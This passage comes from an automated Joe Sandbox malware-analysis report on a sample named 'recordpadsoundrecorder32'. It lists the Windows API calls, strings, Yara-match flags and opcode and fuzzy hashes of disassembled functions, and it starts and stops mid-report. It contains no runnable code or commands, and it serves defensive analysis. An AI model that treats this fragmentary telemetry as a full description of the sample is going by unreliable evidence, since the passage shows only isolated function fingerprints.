                                                                                      • Instruction Fuzzy Hash: 5921E4B1801B449FC720DF6AC54055BFBF8FFA5710B108A5FE4A683A90D7B0A648CF91
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069CE
                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00406357,00200020,00000000,?,00000000), ref: 004069E4
                                                                                      • LCMapStringW.KERNEL32(?,?,?,00000000,Wc@ ,?,?,00406357,00200020,00000000,?,00000000), ref: 00406A17
                                                                                      • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 00406A7F
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,Wc@ ,?,00000000,00000000,?,00000000,?,00406357,00200020,00000000,?,00000000), ref: 00406AA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$ByteCharMultiWide
                                                                                      • String ID: Wc@
                                                                                      • API String ID: 352835431-4128830131
                                                                                      • Opcode ID: 1312c45284bb9b0df6438f0e9267380287f1a9abf6012680dfeac5a7f92326d3
                                                                                      • Instruction ID: 95b79f799a9dc74ab8783d7474949c37cbdd673329ec6272a6b224a97d77f72f
                                                                                      • Opcode Fuzzy Hash: 1312c45284bb9b0df6438f0e9267380287f1a9abf6012680dfeac5a7f92326d3
                                                                                      • Instruction Fuzzy Hash: C2113A32A00209ABCF229F98CD04ADEBFB6FF49350F11816AF911722A0D3368D61DF54
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 02613B14
                                                                                        • Part of subcall function 02612F5C: __FF_MSGBANNER.LIBCMT ref: 02612F73
                                                                                        • Part of subcall function 02612F5C: __NMSG_WRITE.LIBCMT ref: 02612F7A
                                                                                        • Part of subcall function 02612F5C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 02612F9F
                                                                                      • std::exception::exception.LIBCMT ref: 02613B32
                                                                                      • __CxxThrowException@8.LIBCMT ref: 02613B47
                                                                                        • Part of subcall function 0261450A: RaiseException.KERNEL32(?,?,0260FB0D,?,?,?,?,?,?,?,0260FB0D,?,02630F68,?), ref: 0261455F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                      • String ID: bad allocation
                                                                                      • API String ID: 3074076210-2104205924
                                                                                      • Opcode ID: 412c079e47290f72670dc05a1ddf14283cefffef41af1c99023be716cae4bd92
                                                                                      • Instruction ID: cf0097a9ea84f655fe1f96a8b4626cc5b7095e6c6e40a7a0f30a00bb8f2ac013
                                                                                      • Opcode Fuzzy Hash: 412c079e47290f72670dc05a1ddf14283cefffef41af1c99023be716cae4bd92
                                                                                      • Instruction Fuzzy Hash: 30E0307450021AAAEF04FE64DE119AF7779AB10314F444599DC15A6290EB70AA18CED4
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 026037B6
                                                                                      • __localtime64.LIBCMT ref: 026037C1
                                                                                        • Part of subcall function 026125B0: __gmtime64_s.LIBCMT ref: 026125C3
                                                                                      • std::exception::exception.LIBCMT ref: 026037D9
                                                                                        • Part of subcall function 02612483: std::exception::_Copy_str.LIBCMT ref: 0261249C
                                                                                        • Part of subcall function 0260A4D6: __EH_prolog.LIBCMT ref: 0260A4DB
                                                                                        • Part of subcall function 0260A4D6: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 0260A4EA
                                                                                        • Part of subcall function 0260A4D6: __CxxThrowException@8.LIBCMT ref: 0260A509
                                                                                      Strings
                                                                                      • could not convert calendar time to UTC time, xrefs: 026037CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                      • String ID: could not convert calendar time to UTC time
                                                                                      • API String ID: 1963798777-2088861013
                                                                                      • Opcode ID: c7dd616f1cfc4e3a9897583f6ca9eba73d4492cf9e834f2c287befe00ecfea45
                                                                                      • Instruction ID: 71e3c6d37d511d529ac2e362dfdfc1e75fd755046bb8430b6bf8474461082ce0
                                                                                      • Opcode Fuzzy Hash: c7dd616f1cfc4e3a9897583f6ca9eba73d4492cf9e834f2c287befe00ecfea45
                                                                                      • Instruction Fuzzy Hash: 9FE06DB5D0062A9BCB14EF90DA547AFB7B9FB04304F408599DC11A2680EB3456199E98
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00402EAA), ref: 0040319F
                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004031AF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                      • API String ID: 1646373207-3105848591
                                                                                      • Opcode ID: 748c3a06171c204e9a1fd50ae91f73f3c4da2d806122e1fde3641ea021038800
                                                                                      • Instruction ID: 8ffc782c345fbc4a568335a89d7931e33654b4b0dba7f91db9b0a41dc5523864
                                                                                      • Opcode Fuzzy Hash: 748c3a06171c204e9a1fd50ae91f73f3c4da2d806122e1fde3641ea021038800
                                                                                      • Instruction Fuzzy Hash: 25C08C70381B01A6EE602FB22F09B172C0C1B48B43F1800BE7A89F81C0CE7CC208813D
                                                                                      APIs
                                                                                      • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,0040407A), ref: 00404C7D
                                                                                      • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,0040407A), ref: 00404CA1
                                                                                      • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,0040407A), ref: 00404CBB
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,0040407A), ref: 00404D7C
                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,0040407A), ref: 00404D93
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual$FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 714016831-0
                                                                                      • Opcode ID: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                                                      • Instruction ID: 2da35cf39901cd0166ef30884cd3fae4f1f30d489fd3d975fdb0eff0fbde1f7b
                                                                                      • Opcode Fuzzy Hash: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                                                      • Instruction Fuzzy Hash: 5531E2B15017019BE3208F28EE44B22B7A4EBC8754F11863EEA55B73E1E778AC44CB5C
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,00008000,00004000,7591DFF0,?,00000000), ref: 004046D6
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00404731
                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 00404743
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                       • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$Virtual$Heap
                                                                                      • String ID: t/@
                                                                                      • API String ID: 2016334554-3363397731
                                                                                      • Opcode ID: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                                                      • Instruction ID: 8d17195ec0ccff2424cf6b57804f20dfeb37273885bc82fd82189131503ce94b
                                                                                      • Opcode Fuzzy Hash: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                                                      • Instruction Fuzzy Hash: 3EB19EB4A01205DFDB14CF44CAD0A69BBA1FB88314F25C1AEDA596F3A2D735ED41CB84
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AdjustPointer_memmove
                                                                                      • String ID:
                                                                                      • API String ID: 1721217611-0
                                                                                      • Opcode ID: 91063aebefb4cfaa101b633f1eab985e61e70b581db88f8a7cb25c4601122310
                                                                                      • Instruction ID: 359b60514a0862e0507ce8830d00ddd1aa2fb743199ed6b0d63bb4c2114f43bb
                                                                                      • Opcode Fuzzy Hash: 91063aebefb4cfaa101b633f1eab985e61e70b581db88f8a7cb25c4601122310
                                                                                      • Instruction Fuzzy Hash: 784159B56887079EEB289E25E851B7E33E99F01364F1C409FE8459A2D0EB31F190CE57
                                                                                      APIs
                                                                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02604149), ref: 0261136F
                                                                                        • Part of subcall function 02603FDC: __EH_prolog.LIBCMT ref: 02603FE1
                                                                                        • Part of subcall function 02603FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02603FF3
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02611364
                                                                                      • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02604149), ref: 026113B0
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02604149), ref: 02611481
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$Event$CreateH_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 2825413587-0
                                                                                      • Opcode ID: 82e36fd8061d3c7307d3a5a1e9c52b98d61dc8290c5a8c19a8cb4278ce000534
                                                                                      • Instruction ID: f29e1ff5d173a12295f0d53b4dc40e06520376f237b248b3b90e81cb2dbf90cd
                                                                                      • Opcode Fuzzy Hash: 82e36fd8061d3c7307d3a5a1e9c52b98d61dc8290c5a8c19a8cb4278ce000534
                                                                                      • Instruction Fuzzy Hash: 4551FFB16007458BDF20CF28C884B5ABBE4FF49328F190668E96D97380D735E805CB95
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                      • String ID:
                                                                                      • API String ID: 2782032738-0
                                                                                      • Opcode ID: 535039d8e7933aaddd12432e96c3b7a4be113f1a95e655b1b9895bf12f0f7668
                                                                                      • Instruction ID: 7fcef3040e1de7dec79686efc17fc068f5fd9bf08b85eab132b6ce4577dc9397
                                                                                      • Opcode Fuzzy Hash: 535039d8e7933aaddd12432e96c3b7a4be113f1a95e655b1b9895bf12f0f7668
                                                                                      • Instruction Fuzzy Hash: 9F41B575B007069BDF588FA9C8905AEBBA6EF84364B1C81BDE417C7390D770F9618B44
                                                                                      APIs
                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0261FEFB
                                                                                      • __isleadbyte_l.LIBCMT ref: 0261FF29
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 0261FF57
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 0261FF8D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                      • String ID:
                                                                                      • API String ID: 3058430110-0
                                                                                      • Opcode ID: f8a9889000c0f0233ca1d13aa040843ebe7fe52556c584570ae06de2f6be3cb4
                                                                                      • Instruction ID: ec62f718f2dafcbaf602ed8e849ba55314b9750f9cbdb16db2d6bf2c5b2e8450
                                                                                      • Opcode Fuzzy Hash: f8a9889000c0f0233ca1d13aa040843ebe7fe52556c584570ae06de2f6be3cb4
                                                                                      • Instruction Fuzzy Hash: 4C31D031600346AFDB218F75C848BAABBA9FF42314F1D4429F814876A1EB70F861CB90
                                                                                      APIs
                                                                                      • htons.WS2_32(?), ref: 02603DA2
                                                                                        • Part of subcall function 02603BD3: __EH_prolog.LIBCMT ref: 02603BD8
                                                                                        • Part of subcall function 02603BD3: std::bad_exception::bad_exception.LIBCMT ref: 02603BED
                                                                                      • htonl.WS2_32(00000000), ref: 02603DB9
                                                                                      • htonl.WS2_32(00000000), ref: 02603DC0
                                                                                      • htons.WS2_32(?), ref: 02603DD4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                      • String ID:
                                                                                      • API String ID: 3882411702-0
                                                                                      • Opcode ID: 66245b58193775e3fa5e49f685f17726f5af5f9655d2be14a1fa844d923e6673
                                                                                      • Instruction ID: 7dd1ad85be402a5875e1db05a26487dec4a7e150346cbefbd925561e78665456
                                                                                      • Opcode Fuzzy Hash: 66245b58193775e3fa5e49f685f17726f5af5f9655d2be14a1fa844d923e6673
                                                                                      • Instruction Fuzzy Hash: C911C235900209EFCF119F64D885E5AB7B9EF09311F01849AFC04DF284D7719A64CBA5
                                                                                      APIs
                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 026023D0
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 026023DE
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02602401
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02602408
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 4018804020-0
                                                                                      • Opcode ID: 01d4c992d574497c5f1cc9c24c81df327410390fa4aec73b72e428a970ad32b1
                                                                                      • Instruction ID: cb87a28987e75ad3adf531eeaab1c052b3a664a6b5c58870d5fe2662bfddf6ff
                                                                                      • Opcode Fuzzy Hash: 01d4c992d574497c5f1cc9c24c81df327410390fa4aec73b72e428a970ad32b1
                                                                                      • Instruction Fuzzy Hash: 9411CE71600304ABDB299F60D8C8F6BBBB9FF50708F10446DEA019B280D7B1F959DBA0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                      • String ID:
                                                                                      • API String ID: 3016257755-0
                                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                      • Instruction ID: e332b7ee4cba6a63c08e2498b578de637c6747f44e25dc919667fb9d4dd242ba
                                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                      • Instruction Fuzzy Hash: 6001803248014ABBCF526E84DC418EE3F33BB18344B08851AFA1958131C332E5B1EF82
                                                                                      APIs
                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 026024A9
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 026024B8
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 026024CD
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 026024D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 4018804020-0
                                                                                      • Opcode ID: e1dbab0fe373f753051482445040e7cf39cecafb991dfea73dbbbd81b4fd37e8
                                                                                      • Instruction ID: 04280419a4dc733232a3ab855427a346ea68638534e70348cf78e88b4670d9b4
                                                                                      • Opcode Fuzzy Hash: e1dbab0fe373f753051482445040e7cf39cecafb991dfea73dbbbd81b4fd37e8
                                                                                      • Instruction Fuzzy Hash: E5F03CB2540605AFDB019F69E884F9ABBACFF45710F018419FA05CA141D771E5A88FA1
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02602009
                                                                                      • RtlDeleteCriticalSection.NTDLL(?), ref: 02602028
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02602037
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0260204E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                      • String ID:
                                                                                      • API String ID: 2456309408-0
                                                                                      • Opcode ID: 5c5e860506f741b7d99bf5509e5d8ec8accf3ed6d7717f7c666f3c42e16f1e74
                                                                                      • Instruction ID: 9c253612d03944e9acb6e2859712f16c1a0db62b8aa7f3f92dd33bc6ec24353b
                                                                                      • Opcode Fuzzy Hash: 5c5e860506f741b7d99bf5509e5d8ec8accf3ed6d7717f7c666f3c42e16f1e74
                                                                                      • Instruction Fuzzy Hash: 1301ADB1400B549BC7399F54E948BAAFBB4FF04304F00495DE847826D0C774658CDF58
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Event$H_prologSleep
                                                                                      • String ID:
                                                                                      • API String ID: 1765829285-0
                                                                                      • Opcode ID: eabb00f87de7dcb82c27e7895a0275b839cfb34efe004c3d4c503da58268ef2b
                                                                                      • Instruction ID: 5e63710cc876927f560f182c1428e5c9db3df4907f8bd3f5b5b5ec94e84afc3e
                                                                                      • Opcode Fuzzy Hash: eabb00f87de7dcb82c27e7895a0275b839cfb34efe004c3d4c503da58268ef2b
                                                                                      • Instruction Fuzzy Hash: 0AF0BE72640910EFCB109FA4D8C9B9CBBA0FF0C311F4081A8FA0ADB280C7349888CF65
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog_memmove
                                                                                      • String ID: &'
                                                                                      • API String ID: 3529519853-655172784
                                                                                      • Opcode ID: 2980cd74eb21260d6ffddcdfc78b1534982f5782034f3b5a2395794a1edbe23a
                                                                                      • Instruction ID: 295c9655ce4f2a27aa6592b63961b0ed73326ea7a85fea2858620aff25eef7c3
                                                                                      • Opcode Fuzzy Hash: 2980cd74eb21260d6ffddcdfc78b1534982f5782034f3b5a2395794a1edbe23a
                                                                                      • Instruction Fuzzy Hash: DD61AF71D00319DFDF28DFA4C980AEEBBB6AF48314F10806DD509AB281D770AA45DF65
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(?,00000000), ref: 00406083
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID: $
                                                                                      • API String ID: 1807457897-3032137957
                                                                                      • Opcode ID: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                                                      • Instruction ID: 3e87ef9e1105c78bb2f85cebc7c09ea1e0cb28c4563d123519c4b9c13c46ffd4
                                                                                      • Opcode Fuzzy Hash: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                                                      • Instruction Fuzzy Hash: 0C414831004258AAEB119B54CD99BFB3FE9DB06704F1501F6D587FB1D3C23949648BAE
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02608381,?,?,00000000), ref: 0260967E
                                                                                      • getsockname.WS2_32(?,?,?), ref: 02609694
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastgetsockname
                                                                                      • String ID: &'
                                                                                      • API String ID: 566540725-655172784
                                                                                      • Opcode ID: a4169ce1897f219981dd51bc0282bd55a0821687b0797ec9e77001cddd93c207
                                                                                      • Instruction ID: a8f76e393addacf4f62bd4f890ba074e5616a5ec61c009e768fe3ddd3151dafe
                                                                                      • Opcode Fuzzy Hash: a4169ce1897f219981dd51bc0282bd55a0821687b0797ec9e77001cddd93c207
                                                                                      • Instruction Fuzzy Hash: 06218371A112089BDB14DFA8D844ACFF7F5FF48310F11856AE919EB281D730A9458B54
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260CC62
                                                                                        • Part of subcall function 0260D23E: std::exception::exception.LIBCMT ref: 0260D26D
                                                                                        • Part of subcall function 0260D9F4: __EH_prolog.LIBCMT ref: 0260D9F9
                                                                                        • Part of subcall function 02613AFC: _malloc.LIBCMT ref: 02613B14
                                                                                        • Part of subcall function 0260D29D: __EH_prolog.LIBCMT ref: 0260D2A2
                                                                                      Strings
                                                                                      • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 0260CC98
                                                                                      • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 0260CC9F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$_mallocstd::exception::exception
                                                                                      • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                      • API String ID: 1953324306-1943798000
                                                                                      • Opcode ID: f02bb120b6e7b1485ed441df2e726456ce12916185ee604e0eb73371dd4ff20f
                                                                                      • Instruction ID: 9f3de7eeab0c5d8c237c4f2b0b65c191a766296b494867c8c4c50ebc89dcbc1d
                                                                                      • Opcode Fuzzy Hash: f02bb120b6e7b1485ed441df2e726456ce12916185ee604e0eb73371dd4ff20f
                                                                                      • Instruction Fuzzy Hash: 062191B1E00258AADB08EFE8D9946AEFBB5EF54700F14419DE805A73C0DB709A44DF59
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260CD57
                                                                                        • Part of subcall function 0260D315: std::exception::exception.LIBCMT ref: 0260D342
                                                                                        • Part of subcall function 0260DB2B: __EH_prolog.LIBCMT ref: 0260DB30
                                                                                        • Part of subcall function 02613AFC: _malloc.LIBCMT ref: 02613B14
                                                                                        • Part of subcall function 0260D372: __EH_prolog.LIBCMT ref: 0260D377
                                                                                      Strings
                                                                                      • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 0260CD8D
                                                                                      • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 0260CD94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$_mallocstd::exception::exception
                                                                                      • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                      • API String ID: 1953324306-412195191
                                                                                      • Opcode ID: e9adca43e6ef82113b28171567df652aa5adcd77329f3200fc7d495f55487af4
                                                                                      • Instruction ID: 2b5240cbc4f6751e8dc2a4b9fca1b5bb8b06caf02d7f79ac076f361bd9844b6c
                                                                                      • Opcode Fuzzy Hash: e9adca43e6ef82113b28171567df652aa5adcd77329f3200fc7d495f55487af4
                                                                                      • Instruction Fuzzy Hash: 0B21B1B1E002149ADB18EFE4D984AEEBBB5EF04304F14419DE805A73C0DBB05A44DF98
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 0260535D
                                                                                        • Part of subcall function 02612F5C: __FF_MSGBANNER.LIBCMT ref: 02612F73
                                                                                        • Part of subcall function 02612F5C: __NMSG_WRITE.LIBCMT ref: 02612F7A
                                                                                        • Part of subcall function 02612F5C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 02612F9F
                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 0260536F
                                                                                      Strings
                                                                                      Memory Dump Source
